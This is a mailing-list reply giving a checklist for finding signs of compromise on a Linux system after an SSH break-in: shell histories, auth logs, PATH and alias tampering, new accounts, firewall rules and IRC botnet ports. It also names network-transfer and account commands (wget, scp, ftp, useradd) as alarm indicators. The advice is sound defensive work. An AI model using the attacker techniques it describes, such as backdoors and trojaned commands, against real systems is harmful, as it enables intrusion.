On 10/3/07, Jacques B. <jjrboucher@xxxxxxxxx> wrote: > > Jonathan. > > > > ps. You did erase and reinstall your system after it was compromised, right? > > > > This is certainly prudent advice. A good hacker will quickly get a > few back doors installed in case you shut down their initial point of > access (SSH). They may have created their own user account as well. > You should check the following (and more no doubt), especially if you > are considering not wiping and re-installing a fresh system to ensure > it is clean. At least this will allow you to exercise some due > diligence. > > And you should do these checks from a bootable CD as well as some from > the actual booted OS if necessary. > > Examine the .bash_history file for your user and root. See if the > person tried to su to root from your username. > > What other commands did they execute (cp, scp, ftp, wget, useradd, > chmod, chown, path, and many other commands should be cause for > alarm). > > Check the /var/secure file for failures and successes in su'ing to > root as well as ssh to root. > > Check your path (can't just use the echo $PATH command from a bootable CD). > > Check for aliases. > > A hacker who cannot compromise the root account can still substitute > some of your favorite commands with hacked commands and then modify > your path or set up an alias so that their command gets executed > before the real one. > > Check the .bashrc file for anything suspicious. > > Examine your /etc/passwd file for any new user accounts. > > Check iptables, /etc/hosts.allow and /etc/hosts.deny > > > Some of the members on the list will no doubt suggest other things to check. > I was in the rush so missed a few other points that come to mind. Check open/listening ports with the netstat command. Ports 6667, 6668, and 6669 are common IRC ports that could be used by a botnet (but they are not limited to that). Check that you don't have services running that you didn't previously have (i.e. ftpd, sendmail, httpd). And even if there is no evidence in the logs, .bash_history, and a few other places it's still no guarantee. A good hacker will clean up behind themselves. If you find a suspicious process and open port you can use wireshark (formerly ethereal) or tcpdump to capture and analyze the traffic going out, and to which IP (although netstat will tell you the destination IP anyhow). ** Out of curiosity what indicators tipped you off to the intrusion? Clearly the hacker didn't clean up the logs or you were quite observant and noticed something else amiss. If all these checks seem overwhelming that may be a good indicator that wiping and fresh install is in order. Why? Do you do online banking? Do you make online purchases? Send private/sensitive emails? File taxes online? Etc... If your system is compromised then the hacker has the potential of capturing any or all of that. Or using your system to store illegal content (hacking tools, child pornography), as a mail relay thus causing your IP to be flagged as a spammer, or as a proxy while hacking into a government system. Any of which could lead the police to your doorstep down the road leaving you to do a lot of explaining and potentially have to spend $$ defending yourself in court. Jacques B.
